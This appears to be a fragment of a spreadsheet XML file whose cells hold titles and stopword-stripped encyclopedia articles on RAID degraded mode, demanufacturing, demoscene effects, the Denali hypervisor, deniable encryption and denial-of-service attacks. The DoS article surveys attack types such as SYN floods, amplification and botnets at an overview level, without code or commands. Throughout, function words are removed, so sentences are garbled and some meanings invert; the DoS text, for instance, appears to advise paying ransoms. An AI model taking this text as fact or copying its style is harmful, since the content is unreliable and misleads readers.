    <t>when raid array experiences failure disks, enter degraded mode, fallback mode generally allows continued usage array, either loses performance boosts raid technique (such raid-1 mirror across disks fails; performance fall back normal, single drive) experiences severe performance penalties necessity reconstruct damaged data error correction data. depending severity problem, array placed read-only mode, either automatically system administrator, corrected. such corrections possible on-line opposed "off-line" repair, system unavailable users). many raid configurations feature spare disks already installed automatically added array needed; happens, array degraded mode spare rebuilt, case degraded mode spare rebuilt. spares available, array remain degraded mode spare disk added, array reconfigured possible configuration question). typical case raid enters degraded mode simple two-drive mirror power failure unlikely drives sync. every time blocks written storage elements (physical drives, case), certain accounting information updated write. raid controller notice storage elements sync, place array degraded mode, generally start background resync (rebuild) operation. simple mirroring solutions resynchronize entire array, block block, across drives, quite time-consuming; time greatly reduced usage write intent bitmap. references</t>
  </si>
  <si>
    <t>Demanufacturing</t>
  </si>
  <si>
    <t>demanufacturing process product extensive usage, often lifespan, disassembled components, components classified functionality components suitable reuse returned product reuse, components deemed unusable typically recycled used products. demanufacturing proposed used industries means reduce environmental footprint preserving economic viability processes involved. this term first coined professor walter olson professor john sutherland 1993.in case waste electronics demanufacturing involves dismantling components. case material demanufacturing chemical process, treatment waste plastics breaking long polymers smaller polymers. forms demanufacturing there forms demanufacturing: destructive non-destructive. non-destructive demanufacturing allows components taken apart reused products mainly focused however, sometimes destructive demanufacturing used, case careful preparation taken optimal cutting points used take product apart take needed reuse. economic effects there numerous economic effects come demanufacturing. practice provides numerous jobs people communities; addition money saved reusing pieces products screws parts saves manufacturers millions. estimated office federal environmental executive $100 billion revenue generated practice. references</t>
  </si>
  <si>
    <t>Demo effect</t>
  </si>
  <si>
    <t>demo effect computer-based real-time visual effects found demos created demoscene. main purpose demo effects demos show skills programmer. because this, demo coders often attempted create effects whose technical basis cannot easily figured fellow programmers. sometimes, particularly case severely limited platforms commodore demo effect make target machine things supposedly beyond capabilities. ability creatively overcome major technical limitations greatly appreciated among demosceners. modern demos focused effects demos 1980s 1990s. effects rarely stand-alone content elements anymore, role programmer showcase diminished, particularly demos. today, demosceners likely demonstrate programming skills procedural content generation engine features superior visual effects. hardware considerations there demos written many different devices vary considerably graphical features data processing capabilities. variability hardware also reflects types effects invented platform well methods used implementation. demoscene took home computers commodore amiga, relatively advanced "hackable" custom chips cpus. before widespread advanced computer aided design integrated circuits, chips designed hand often many undocumented unintended features. lack standardisation also meant hardware design tended reflect designers ideas creative flair. reason, "old school" demo effects based creative exploitation features particular hardware. effort reverse-engineering hardware order find undocumented possibilities usable effects. compatibles 1990s, however, lacked many special features typical home computers, instead using standard parts. this compensated greater general-purpose computing power. possibility advanced hardware trickery also limited great variability hardware. reasons, democoders preferred focus pixel-level software rendering algorithms. democoders often looked challenge respect "porting" effects platform another. example, "golden age" amiga demos, many well-known amiga effects remade atari commodore considered inferior features required effects question. since mid-1990s, become major platform, demos amiga c-64 started feature pc-like "pixel effects" well. early history earliest computer programs resembling demo effects predate demoscene several decades. perhaps earliest example so-called display hacks program called bouncing ball whirlwind computer early 1950s. another famous display hack, munching squares, originally created pdp-1 1962. "old school" effects these effects typical 1980s early 1990s first implemented either commodore atari amiga. they often relied systems custom hardware considered difficult example, objects rendered dots somewhat tricky systems without byte-per-pixel displays limited video memory bandwidth, systems slow and/or limited (e.g. bit, fpu) cpus. raster bars, also called copper bars amiga. scrollers various kinds. moving sprites, competition usually focused number visible sprites frame. starfields, parallax-scrolling perspective starfields. smooth horizontal waving graphics images per-scanline basis shadebobs infinite bobs plasma effect kefrens bars moire patterns, particularly circles text zoomers simple rotating objects rendered dots, lines filled polygons. spline effect vector graphics glenz, partially see-through models "diamond-like" look. named photon swedish word "gläns" (glisten glitter) blenk, shiny metallic aluminum-like models, swedish "blänk" (shiny) rubber, twisting and/or elastic models. also sometimes referred chunky-pixel effects effects based software rendering chunky-pixel framebuffers typical late 1990s usually first implemented falcon030. they became popular systems pixel-addressable high speed video memory faster processors allow demanding real-time calculations) became common. effects based static screen-to-texture lookup tables texture-mapped tunnels objects rotating around axis symmetry wobblers, rotators similar effects images objects reflect refract underlying bitmap images texture-mapped tunnel freely moving camera, typically based realtime raytracing rotozoomer mandelbrot zoomer fire effect effects based filters feedback heightfield landscape (often called "voxel landscape") bump mapping metaballssome effects later ported planar pixel machines amiga, without relying chunky planar conversion. example, group sanity implemented rotozoomer using combination pre-rendered planar bitmaps copper effects. rendering computer graphics featured demos since late 1980s. nowadays, general-purpose engine integral part demos. late 1980s early 1990s, rotating objects considered effects right difficulty calculating rendering them. particular, systems floating point unit. rather general-purpose algorithms, democoders often used special-purpose tricks highly optimized rotation rendering particular object cube sphere. since even drawing dots, lines filled polygons difficult task competition often revolved around simply optimising drawing routines using pre-calculated maths. casual viewer, many demo effects look like something attainable general-purpose engine. however, classic effects apparent look often real-time calculation whatsoever. example, static screen-to-texture look-up tables used symmetrical objects rotate around axis symmetry. before advent mass-marketed acceleration hardware, democoders often focused lighting shading techniques software engines, including gouraud shading, phong shading, texture mapping, bump mapping, environment mapping, radiosity even real-time tracing. general-purpose engines seldom called "effects", although rendered scenes often contain something regarded such. also display hack algorithmic references</t>
  </si>
  <si>
    <t>Denali (operating system)</t>
  </si>
  <si>
    <t>denali operating system ia-32 virtual machine monitor, allows untrusted services isolated (protected) domains."denali makes paravirtualization support high performance virtual machines, even notoriously uncooperative architecture (see virtualization). envisioned usage model original denali support virtual machines running lightweight single application operating systems internet services. later revision denali (udenali) includes support running full-featured operating systems. references external links denali, lightweight virtual machines distributed networked systems</t>
  </si>
  <si>
    <t>Deniable encryption</t>
  </si>
  <si>
    <t>cryptography steganography, plausibly deniable encryption describes encryption techniques existence encrypted file message deniable sense adversary cannot prove plaintext data exists.the users convincingly deny given piece data encrypted, able decrypt given piece encrypted data, specific encrypted data exists. such denials genuine. example, impossible prove data encrypted without cooperation users. data encrypted, users genuinely able decrypt deniable encryption serves undermine attacker's confidence either data encrypted, person possession decrypt provide associated plaintext. function deniable encryption makes impossible prove existence plaintext message without proper decryption key. this done allowing encrypted message decrypted different sensible plaintexts, depending used. this allows sender plausible deniability compelled give encryption key. notion "deniable encryption" used julian assange ralf weinmann rubberhose filesystem explored detail paper canetti, cynthia dwork, moni naor, rafail ostrovsky 1996. scenario deniable encryption allows sender encrypted message deny sending message. this requires trusted third party. possible scenario works like this: suspects wife alice engaged adultery. that case, alice wants communicate secret lover carl. creates keys, intended kept secret, intended sacrificed. passes secret both) carl. alice constructs innocuous message carl (intended revealed case discovery) incriminating love letter carl. constructs cipher-text messages, emails carl. carl uses decrypt (and possibly order read fake message, too). finds email carl, becomes suspicious forces alice decrypt message. alice uses sacrificial reveals innocuous message bob. since impossible know sure might messages contained might assume messages (alternatively, familiar concept plausible encryption first place, thus aware even possible contain message).another possible scenario involves alice sending ciphertext (some secret instructions) carl, handed different keys. carl receive different instructions must able read other's instructions. receive message first forward carl. alice constructs ciphertext messages, emails bob. uses decrypt able read forwards ciphertext carl. carl uses decrypt able read forms deniable encryption normally, ciphertexts decrypt single plaintext intended kept secret. however, form deniable encryption allows users decrypt ciphertext produce different (innocuous plausible) plaintext plausibly claim encrypted. holder ciphertext able differentiate true plaintext, bogus-claim plaintext. general, ciphertext cannot decrypted possible plaintexts unless large plaintext, practical cases ciphertext reveal information whatsoever plaintext. however, schemes allow decryption decoy plaintexts close original metric (such edit distance). modern deniable encryption techniques exploit fact without key, infeasible distinguish ciphertext block ciphers data generated cryptographically secure pseudorandom number generator (the cipher's pseudorandom permutation properties).this used combination decoy data user would plausibly want keep confidential revealed attacker, claiming this form steganography. user supply correct truly secret data, decrypting result apparently random data, indistinguishable stored particular data there. example deniable encryption cryptographic filesystem employs concept abstract "layers", layer decrypted different encryption key. additionally, special "chaff layers" filled random data order plausible deniability existence real layers encryption keys. user store decoy files layers denying existence others, claiming rest space taken chaff layers. physically, types filesystems typically stored single directory consisting equal-length files filenames either randomized case belong chaff layers), cryptographic hashes strings identifying blocks. timestamps files always randomized. examples approach include rubberhose filesystem phonebookfs. another approach used conventional disk encryption software suites creating second encrypted volume within container volume. container volume first formatted filling encrypted random data, initializing filesystem user fills filesystem legitimate, plausible-looking decoy files user would seem incentive hide. next, encrypted volume (the hidden volume) allocated within free space container filesystem used data user actually wants hide. since adversary cannot differentiate encrypted data random data used initialize outer volume, inner volume undetectable. librecrypt bestcrypt many hidden volumes container; truecrypt limited hidden volume. detection existence hidden encrypted data revealed flaws implementation. also revealed so-called watermarking attack inappropriate cipher mode used. existence data revealed 'leaking' non-encrypted disk space detected forensic tools.doubts raised level plausible deniability 'hidden volumes' contents "outer" container filesystem 'frozen' initial state prevent user corrupting hidden volume (this detected access modification timestamps), could raise suspicion. this problem eliminated instructing system protect hidden volume, although could result lost data. drawbacks possession deniable encryption tools could lead attackers continue torturing user even user revealed keys, attackers could know whether user revealed last not. however, knowledge fact disincentivize users revealing keys begin with, since never able prove attacker revealed last key. deniable authentication some in-transit encrypted messaging suites, off-the-record messaging, offer deniable authentication gives participants plausible deniability conversations. while deniable authentication technically "deniable encryption" encryption messages denied, deniability refers inability adversary prove participants conversation said anything particular. this achieved fact information necessary forge messages appended encrypted messages adversary able create digitally authentic messages conversation (see hash-based message authentication code (hmac)), also able forge messages conversation. this used conjunction perfect forward secrecy assure compromise encryption keys individual messages compromise additional conversations messages. software openpuff, freeware semi-open-source steganography windows. librecrypt, opensource transparent disk encryption windows pocketpc pdas provides deniable encryption plausible deniability. offers extensive range encryption options, need installed long user administrator rights. off-the-record messaging, cryptographic technique providing true deniability instant messaging. rubberhose, defunct project (last release 2000, compatible modern linux distributions) stegfs, current successor ideas embodied rubberhose phonebookfs filesystems. veracrypt successor discontinued truecrypt), on-the-fly disk encryption software windows, linux providing limited deniable encryption extent (due limitations number hidden volumes created)plausible deniability, without needing installed long user full administrator rights. vanish, research prototype implementation self-destructing data storage. also chaffing winnowing deniable authentication dm-crypt disclosure legislation requires individuals surrender cryptographic keys enforcement plausible deniability ability deny responsibility rubber-hose cryptanalysis extraction cryptographic secrets coercion torture steganography hiding messages messages unicity distance length ciphertext needed unambiguously break cipher references further reading czeskis, hilaire, koscher, gribble, kohno, schneier, (2008). "defeating encrypted deniable file systems: truecrypt v5.1a case tattling applications" (pdf). workshop topics security. usenix. howlader, jaydeep; basu, saikat (2009). "sender-side public deniable encryption scheme". proceedings international conference advances recent technologies communication computing. ieee. doi:10.1109/artcom.2009.107. howlader, jaydeep; nair, vivek; basu, saikat (2011). "deniable encryption replacement untappable channel prevent coercion". proc. advances networks communications. communications computer information science. vol. 132. springer. 491–501. doi:10.1007/978-3-642-17878-8_50.</t>
  </si>
  <si>
    <t>Denial-of-service attack</t>
  </si>
  <si>
    <t>computing, denial-of-service attack (dos attack) cyber-attack perpetrator seeks make machine network resource unavailable intended users temporarily indefinitely disrupting services host connected network. denial service typically accomplished flooding targeted machine resource superfluous requests attempt overload systems prevent legitimate requests fulfilled.in distributed denial-of-service attack (ddos attack), incoming traffic flooding victim originates many different sources. more sophisticated strategies required mitigate type attack, simply attempting block single source insufficient multiple sources.a ddos attack analogous group people crowding entry door shop, making hard legitimate customers enter, thus disrupting trade. criminal perpetrators attacks often target sites services hosted high-profile servers banks credit card payment gateways. revenge, blackmail activism motivate attacks. history panix, third-oldest world, target thought first attack. september 1996, panix subject flood attack, brought services several days hardware vendors, notably cisco, figured proper defense.another early demonstration attack made khan smith 1997 event, disrupting internet access vegas strip hour. release sample code event online attack sprint, earthlink, e-trade major corporations year follow.in september 2017, google cloud experienced attack peak volume 2.54 terabits second. march 2018, unnamed customer us-based service provider arbor networks fell victim largest ddos date, reaching peak terabits second. previous record days earlier, march 2018, github attack 1.35 terabits second.in february 2020, amazon services experienced attack peak volume terabits second. july 2021, provider cloudflare boasted protecting client ddos attack global mirai botnet 17.2 million requests second. russian ddos prevention provider yandex said blocked http pipelining ddos attack sept. 2021 originated unpatched mikrotik networking gear. types denial-of-service attacks characterized explicit attempt attackers prevent legitimate service. there general forms attacks: crash services flood services. serious attacks distributed. distributed distributed denial-of-service (ddos) attack occurs multiple systems flood bandwidth resources targeted system, usually servers. ddos attack uses unique address machines, often thousands hosts infected malware. distributed denial service attack typically involves around nodes different networks; fewer nodes qualify attack ddos attack.multiple machines generate attack traffic machine, multiple attack machines harder turn attack machine, behavior attack machine stealthier, making harder track shut down. since incoming traffic flooding victim originates different sources, impossible stop attack simply using ingress filtering. also makes difficult distinguish legitimate user traffic attack traffic spread across multiple points origin. alternative augmentation ddos, attacks involve forging sender addresses address spoofing) complicating identifying defeating attack. these attacker advantages cause challenges defense mechanisms. example, merely purchasing incoming bandwidth current volume attack might help, attacker might able simply attack machines. scale ddos attacks continued rise recent years, 2016 exceeding terabit second. some common examples ddos attacks flooding, flooding amplification. yo-yo attack yo-yo attack specific type dos/ddos aimed cloud-hosted applications autoscaling. attacker generates flood traffic cloud-hosted service scales outwards handle increase traffic, halts attack, leaving victim over-provisioned resources. when victim scales back down, attack resumes, causing resources scale back again. this result reduced quality service periods scaling financial drain resources periods over-provisioning, operating lower cost attacker compared normal ddos attack, needs generating traffic portion attack period. application layer attacks application layer ddos attack (sometimes referred layer ddos attack) form ddos attack attackers target application-layer processes. attack over-exercises specific functions features website intention disable functions features. this application-layer attack different entire network attack, often used financial institutions distract security personnel security breaches. 2013, application-layer ddos attacks represented ddos attacks. according research akamai technologies, percent application layer attacks" 2013 2014 percent more" 2014 2014. november 2017; junade ali, engineer cloudflare noted whilst network-level attacks continue high capacity, occurring less frequently. noted although network-level attacks becoming less frequent, data cloudflare demonstrated application-layer attacks still showing sign slowing down. december 2021, following log4shell security vulnerability, second vulnerability open source log4j library discovered could lead application layer ddos attacks. application layer model (iso/iec 7498-1) conceptual model characterizes standardizes internal functions communication system partitioning abstraction layers. model product open systems interconnection project international organization standardization (iso). model groups similar communication functions seven logical layers. layer serves layer served layer example, layer provides error-free communications across network provides communications path needed applications calls next lower layer send receive packets traverse path. model, definition application layer narrower scope often implemented. model defines application layer user interface. application layer responsible displaying data images user human-recognizable format interface presentation layer implementation, application presentation layers frequently combined. method attack simplest attack relies primarily brute force, flooding target overwhelming flux packets, oversaturating connection bandwidth depleting target's system resources. bandwidth-saturating floods rely attacker's ability generate overwhelming flux packets. common achieving today distributed denial-of-service, employing botnet. application layer ddos attack done mainly specific targeted purposes, including disrupting transactions access databases. requires fewer resources network layer attacks often accompanies them. attack disguised look like legitimate traffic, except targets specific application packets functions. attack application layer disrupt services retrieval information search functions website. advanced persistent advanced persistent (apdos) associated advanced persistent threat requires specialized ddos mitigation. these attacks persist weeks; longest continuous period noted lasted days. this attack involved approximately petabits (50,000+ terabits) malicious traffic.attackers scenario tactically switch several targets create diversion evade defensive ddos countermeasures eventually concentrating main thrust attack onto single victim. scenario, attackers continuous access several powerful network resources capable sustaining prolonged campaign generating enormous levels un-amplified ddos traffic. apdos attacks characterized advanced reconnaissance (pre-attack osint extensive decoyed scanning crafted evade detection long periods) tactical execution (attack primary secondary victims focus primary) explicit motivation calculated game/goal target) large computing capacity (access substantial computer power network bandwidth) simultaneous multi-threaded layer attacks (sophisticated tools operating layers persistence extended periods (combining concerted, well-managed attack across range targets). denial-of-service service some vendors provide so-called "booter" "stresser" services, simple web-based front ends, accept payment web. marketed promoted stress-testing tools, used perform unauthorized denial-of-service attacks, allow technically unsophisticated attackers access sophisticated attack tools. usually powered botnet, traffic produced consumer stresser range anywhere 5-50 gbit/s, can, cases, deny average home user internet access. symptoms united states computer emergency readiness team (us-cert) identified symptoms denial-of-service attack include: unusually slow network performance (opening files accessing sites), unavailability particular site, inability access site. attack techniques attack tools cases mydoom slowloris, tools embedded malware launch attacks without knowledge system owner. stacheldraht classic example ddos tool. uses layered structure attacker uses client program connect handlers compromised systems issue commands zombie agents turn facilitate ddos attack. agents compromised handlers attacker using automated routines exploit vulnerabilities programs accept remote connections running targeted remote hosts. each handler control thousand agents.in cases machine become part ddos attack owner's consent, example, operation payback organized group anonymous. orbit cannon typically used way. along high orbit cannon wide variety ddos tools available today, including paid free versions, different features available. there underground market hacker-related forums channels. application-layer attacks application-layer attacks employ dos-causing exploits cause server-running software fill disk space consume available memory time. attacks specific packet types connection requests saturate finite resources example, occupying maximum number open connections filling victim's disk space logs. attacker shell-level access victim's computer slow unusable crash using fork bomb. another kind application-level attack xdos dos) controlled modern application firewalls (wafs). attacks belonging category timeout exploiting slow attacks implement application-layer attack. examples threats slowloris, establishing pending connections victim, slowdroid, attack running mobile devices. another target ddos attacks produce added costs application operator, latter uses resources based cloud computing. case, normally application-used resources tied needed quality service (qos) level (e.g. responses less rule usually linked automated software (e.g. amazon cloudwatch) raise virtual resources provider meet defined levels increased requests. main incentive behind attacks drive application owner raise elasticity levels handle increased application traffic, cause financial losses, force become less competitive. banana attack another particular type dos. involves redirecting outgoing messages client back onto client, preventing outside access, well flooding client sent packets. land attack type. degradation-of-service attacks pulsing zombies compromised computers directed launch intermittent short-lived floodings victim websites intent merely slowing rather crashing this type attack, referred degradation-of-service, difficult detect disrupt hamper connection websites prolonged periods time, potentially causing overall disruption denial-of-service attack. exposure degradation-of-service attacks complicated matter discerning whether server really attacked experiencing higher normal legitimate traffic loads. distributed attack attacker mounts attack single host, would classified attack. attack availability would classed denial-of-service attack. hand, attacker uses many systems simultaneously launch attacks remote host, would classified ddos attack. malware carry ddos attack mechanisms; better-known examples mydoom. mechanism triggered specific date time. this type ddos involved hardcoding target address releasing malware interaction necessary launch attack. system also compromised trojan containing zombie agent. attackers also break systems using automated tools exploit flaws programs listen connections remote hosts. this scenario primarily concerns systems acting servers web. stacheldraht classic example ddos tool. uses layered structure attacker uses client program connect handlers, compromised systems issue commands zombie agents, turn facilitate ddos attack. agents compromised handlers attacker. each handler control thousand agents. cases machine become part ddos attack owner's consent, example, operation payback, organized group anonymous. these attacks different types internet packets tcp, udp, icmp, etc. these collections compromised systems known botnets. ddos tools like stacheldraht still classic attack methods centered spoofing amplification like smurf attacks fraggle attacks (types bandwidth consumption attacks). floods resource starvation attack) also used. newer tools servers purposes. unlike mydoom's ddos mechanism, botnets turned address. script kiddies deny availability well known websites legitimate users. more sophisticated attackers ddos tools purposes extortion including business rivals.it reported attacks internet things (iot) devices involved denial service attacks. noted attack made peaked around 20,000 requests second came around cctv cameras.uk's gchq tools built ddos, named predators face rolling thunder.simple attacks floods appear wide range source addresses, giving appearance distributed dos. these flood attacks require completion three-way handshake attempt exhaust destination queue server bandwidth. because source addresses trivially spoofed, attack could come limited sources, even originate single host. stack enhancements cookies effective mitigation queue flooding address bandwidth exhaustion. ddos extortion 2015, ddos botnets dd4bc grew prominence, taking financial institutions. cyber-extortionists typically begin low-level attack warning larger attack carried ransom paid bitcoin. security experts recommend targeted websites ransom. attackers tend extended extortion scheme recognize target ready pay. http slow post attack first discovered 2009, http slow post attack sends complete, legitimate http post header, includes content-length field specify size message body follow. however, attacker proceeds send actual message body extremely slow rate (e.g. byte/110 seconds). entire message correct complete, target server attempt obey content-length field header, wait entire body message transmitted, take long time. attacker establishes hundreds even thousands connections resources incoming connections victim server exhausted, making connections impossible data sent. notable unlike many ddos ddos attacks, subdue server overloading network cpu, http slow post attack targets logical resources victim, means victim would still enough network bandwidth processing power operate. combined fact apache http server will, default, accept requests size, attack particularly powerful. http slow post attacks difficult differentiate legitimate connections therefore able bypass protection systems. owasp, open source application security project, released tool test security servers type attack. challenge collapsar (cc) attack challenge collapsar (cc) attack attack standard http requests sent targeted server frequently. uniform resource identifiers (uris) requests require complicated time-consuming algorithms database operations exhaust resources targeted server.in 2004, chinese hacker nicknamed kiki invented hacking tool send kinds requests attack nsfocus firewall named collapsar, thus hacking tool known challenge collapsar, short. consequently, type attack name attack. internet control message protocol (icmp) flood smurf attack relies misconfigured network devices allow packets sent computer hosts particular network broadcast address network, rather specific machine. attacker send large numbers packets source address faked appear address victim. most devices network will, default, respond sending reply source address. number machines network receive respond packets large, victim's computer flooded traffic. this overloads victim's computer even make unusable attack.ping flood based sending victim overwhelming number ping packets, usually using ping command unix-like hosts. simple launch, primary requirement access greater bandwidth victim. ping death based sending victim malformed ping packet, lead system crash vulnerable system. blacknurse attack example attack taking advantage required destination port unreachable icmp packets. nuke nuke old-fashioned denial-of-service attack computer networks consisting fragmented otherwise invalid icmp packets sent target, achieved using modified ping utility repeatedly send corrupt data, thus slowing affected computer comes complete stop.a specific example nuke attack gained prominence winnuke, exploited vulnerability netbios handler windows string out-of-band data sent port victim's machine, causing lock display blue screen death. peer-to-peer attacks attackers found exploit number bugs peer-to-peer servers initiate ddos attacks. aggressive peer-to-peer-ddos attacks exploits dc++. with peer-to-peer botnet attacker communicate clients subverts. instead, attacker acts puppet master, instructing clients large peer-to-peer file sharing hubs disconnect peer-to-peer network connect victim's website instead. permanent denial-of-service attacks permanent denial-of-service (pdos), also known loosely phlashing, attack damages system badly requires replacement reinstallation hardware. unlike distributed denial-of-service attack, pdos attack exploits security flaws allow remote administration management interfaces victim's hardware, routers, printers, networking hardware. attacker uses vulnerabilities replace device's firmware modified, corrupt, defective firmware image—a process done legitimately known flashing. intent brick device, rendering unusable original purpose repaired replaced. pdos pure hardware targeted attack much faster requires fewer resources using botnet ddos attack. because features, potential high probability security exploits network-enabled embedded devices, technique come attention numerous hacking communities. brickerbot, piece malware targeted devices, used pdos attacks disable targets.phlashdance tool created rich smith employee hewlett-packard's systems security lab) used detect demonstrate pdos vulnerabilities 2008 eusecwest applied security conference london. reflected attack distributed denial-of-service attack involve sending forged requests type large number computers reply requests. using internet protocol address spoofing, source address targeted victim, means replies (and flood) target. this reflected attack form sometimes called "drdos".icmp echo request attacks (smurf attacks) considered form reflected attack, flooding hosts send echo requests broadcast addresses mis-configured networks, thereby enticing hosts send echo reply packets victim. some early ddos programs implemented distributed form attack. amplification amplification attacks used magnify bandwidth sent victim. many services exploited reflectors, harder block others. us-cert observed different services result different amplification factors, tabulated below: amplification attacks involves attacker sending name lookup request public servers, spoofing source address targeted victim. attacker tries request much information possible, thus amplifying response sent targeted victim. since size request significantly smaller response, attacker easily able increase amount traffic directed target.snmp also exploited reflector amplification attack. example amplified ddos attack network time protocol (ntp) command called monlist, sends details last hosts requested time server back requester. small request time server sent using spoofed source address victim, results response 556.9 times size request sent victim. this becomes amplified using botnets send requests spoofed source, result massive amount data sent back victim. difficult defend types attacks response data coming legitimate servers. these attack requests also sent udp, require connection server. this means source verified request received server. bring awareness vulnerabilities, campaigns started dedicated finding amplification vectors people fixing resolvers resolvers shut completely. mirai botnet this attack works using worm infect hundreds thousands devices across internet. worm propagates networks systems taking control poorly protected devices thermostats, wi-fi-enabled clocks, washing machines. owner user usually immediate indication when device becomes enslaved. device direct target attack, used part larger attack. once hacker enslaved desired number devices, instruct devices contact isp. october 2016, mirai botnet attacked sites twitter, netflix, etc. soon occurred, websites unreachable several hours. r-u-dead-yet? (rudy) rudy attack targets applications starvation available sessions server. much like slowloris, rudy keeps sessions halt using never-ending post transmissions sending arbitrarily large content-length header value. sack panic manipulating maximum segment size selective acknowledgement (sack) used remote peer cause denial service integer overflow linux kernel, causing even kernel panic. jonathan looney discovered cve-2019-11477, cve-2019-11478, cve-2019-11479 june 2019. shrew attack shrew attack denial-of-service attack transmission control protocol attacker employs man-in-the-middle techniques. uses short synchronized bursts traffic disrupt connections link, exploiting weakness tcp's re-transmission timeout mechanism. slow read attack slow read attack sends legitimate application layer requests, reads responses slowly, thus trying exhaust server's connection pool. achieved advertising small number receive window size, time emptying clients' receive buffer slowly, causes data flow rate. sophisticated low-bandwidth distributed denial-of-service attack sophisticated low-bandwidth ddos attack form uses less traffic increases effectiveness aiming weak point victim's system design, i.e., attacker sends traffic consisting complicated requests system. essentially, sophisticated ddos attack lower cost less traffic, smaller size making difficult identify, ability hurt systems protected flow control mechanisms. (s)syn flood flood occurs host sends flood tcp/syn packets, often forged sender address. each packets handled like connection request, causing server spawn half-open connection, sending back tcp/syn-ack packet (acknowledge), waiting packet response sender address (response packet). however, sender's address forged, response never comes. these half-open connections saturate number available connections server make, keeping responding legitimate requests attack ends. teardrop attacks teardrop attack involves sending mangled fragments overlapping, oversized payloads target machine. this crash various operating systems tcp/ip fragmentation re-assembly code. windows 3.1x, windows windows operating systems, well versions linux prior versions 2.0.32 2.1.63 vulnerable attack. (although september 2009, vulnerability windows vista referred "teardrop attack", targeted smb2 higher layer packets teardrop used).one fields header “fragment offset” field, indicating starting position, offset, data contained fragmented packet relative data original packet. offset size fragmented packet differs next fragmented packet, packets overlap. when happens, server vulnerable teardrop attacks unable reassemble packets resulting denial-of-service condition. telephony denial-of-service (tdos) voice made abusive origination large numbers telephone voice calls inexpensive readily automated permitting call origins misrepresented caller spoofing. according federal bureau investigation, telephony denial-of-service (tdos) appeared part various fraudulent schemes: scammer contacts victim's banker broker, impersonating victim request funds transfer. banker's attempt contact victim verification transfer fails victim's telephone lines flooded thousands bogus calls, rendering victim unreachable. scammer contacts consumers bogus claim collect outstanding payday loan thousands dollars. when consumer objects, scammer retaliates flooding victim's employer thousands automated calls. cases, displayed caller spoofed impersonate police enforcement agencies. swatting: scammer contacts consumers bogus debt collection demand threatens send police; victim balks, scammer floods local police numbers calls caller spoofed display victim's number. police soon arrive victim's residence attempting find origin calls.telephony denial-of-service exist even without internet telephony. 2002 hampshire senate election phone jamming scandal, telemarketers used flood political opponents spurious calls phone banks election day. widespread publication number also flood enough calls render unusable, happened accident 1981 multiple +1-area code-867-5309 subscribers inundated hundreds calls daily response song 867-5309/jenny. tdos differs telephone harassment (such prank calls obscene phone calls) number calls originated; occupying lines continuously repeated automated calls, victim prevented making receiving routine emergency telephone calls. related exploits include flooding attacks black loop transmission. expiry attack takes router resources drop packet value less forward packet higher value. when packet dropped expiry, router must generate send icmp time exceeded response. generating many responses overload router's cpu. upnp attack this attack uses existing vulnerability universal plug play (upnp) protocol around considerable amount present defense methods flood target's network servers. attack based amplification technique, attack mechanism upnp router forwards requests outer source another disregarding upnp behavior rules. using upnp router returns data unexpected port bogus address, making harder take simple action shut traffic flood. according imperva researchers, effective stop attack companies lock upnp routers. ssdp reflection attack 2014 discovered ssdp used ddos attacks known "ssdp reflection attack amplification". many devices, including residential routers, vulnerability upnp software allows attacker replies port number 1900 destination address choice. with botnet thousands devices, attackers generate sufficient packet rates occupy bandwidth saturate links, causing denial services. network company cloudflare described attack "stupidly simple ddos protocol". spoofing spoofing common attack involves vulnerability protocol allows attacker associate address address another computer gateway (like router), causing traffic intended original authentic re-routed attacker, causing denial service. defense techniques defensive responses denial-of-service attacks typically involve combination attack detection, traffic classification response tools, aiming block traffic identify illegitimate allow traffic identify legitimate. list prevention response tools provided below: upstream filtering traffic destined victim diverted pass "cleaning center" "scrubbing center" various methods changing victim address system, tunneling methods (gre/vrf, mpls, sdn), proxies, digital cross connects, even direct circuits, separates "bad" traffic (ddos also common internet attacks) sends good legitimate traffic victim server. provider needs central connectivity internet manage kind service unless happen located within facility "cleaning center" "scrubbing center". ddos attacks overwhelm type hardware firewall, passing malicious traffic large mature networks becomes effective economically sustainable ddos. application front hardware application front-end hardware intelligent hardware placed network traffic reaches servers. used networks conjunction routers switches. application front-end hardware analyzes data packets enter system, identifies priority, regular, dangerous. there bandwidth management vendors. application level completion indicators approaches ddos attacks cloud-based applications based application layer analysis, indicating whether incoming bulk traffic legitimate thus triggering elasticity decisions without economical implications ddos attack. these approaches mainly rely identified path value inside application monitor progress requests path, markers called completion indicators.in essence, techniques statistical methods assessing behavior incoming requests detect something unusual abnormal going analogy brick-and-mortar department store customers spend, average, known percentage time different activities picking items examining them, putting back, filling basket, waiting pay, paying, leaving. these high-level activities correspond completion indicators service site, normal behavior determined, abnormal behavior identified. customers arrived store spent time picking items putting back, never made purchases, could flagged unusual behavior. department store attempt adjust periods high activity bringing reserve employees short notice. routinely, start showing never buying anything, could ruin store extra employee costs. soon store would identify activity scale back number employees, recognizing provides profit served. while make difficult legitimate customers served mob's presence, saves store total ruin. case elastic cloud services huge abnormal additional workload incur significant charges cloud service provider, technique used scale back even stop expansion server availability protect economic loss. blackholing sinkholing with blackhole routing, traffic attacked address sent "black hole" (null interface non-existent server). efficient avoid affecting network connectivity, managed isp.a sinkhole routes traffic valid address analyzes traffic rejects packets. sinkholing efficient severe attacks. based prevention intrusion prevention systems (ips) effective attacks signatures associated them. however, trend among attacks legitimate content intent. intrusion-prevention systems work content recognition cannot block behavior-based attacks.an asic based detect block denial-of-service attacks processing power granularity analyze attacks like circuit breaker automated way. based defense more focused problem ips, defense system (dds) block connection-based attacks legitimate content intent. also address protocol attacks (such teardrop ping death) rate-based attacks (such icmp floods floods). purpose-built system easily identify obstruct denial service attacks greater speed software based system. firewalls case simple attack, firewall could simple rule added deny incoming traffic attackers, based protocols, ports, originating addresses. more complex attacks however hard block simple rules: example, ongoing attack port (web service), possible drop incoming traffic port prevent server serving legitimate traffic. additionally, firewalls deep network hierarchy, routers adversely affected traffic gets firewall. also, many security tools still support ipv6 configured properly, firewalls often might bypassed attacks. routers similar switches, routers rate-limiting capability. they, too, manually set. most routers easily overwhelmed attack.nokia sr-os using fp4/fp5 processors offers ddos protection. nokia sr-os also uses data analytics based nokia deepfield defender ddos protection.cisco optional features reduce impact flooding. switches most switches rate-limiting capability. some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (tcp splicing), deep packet inspection bogon filtering (bogus filtering) detect remediate attacks automatic rate filtering link failover balancing.these schemes work long attacks prevented using them. example, flood prevented using delayed binding splicing. similarly, content-based prevented using deep packet inspection. attacks originating dark addresses going dark addresses prevented using bogon filtering. automatic rate filtering work long rate thresholds correctly. wan-link failover work long links dos/ddos prevention mechanism. blocking vulnerable ports example, ssdp reflection attack; mitigation block incoming traffic port 1900 firewall. unintentional denial-of-service unintentional denial-of-service 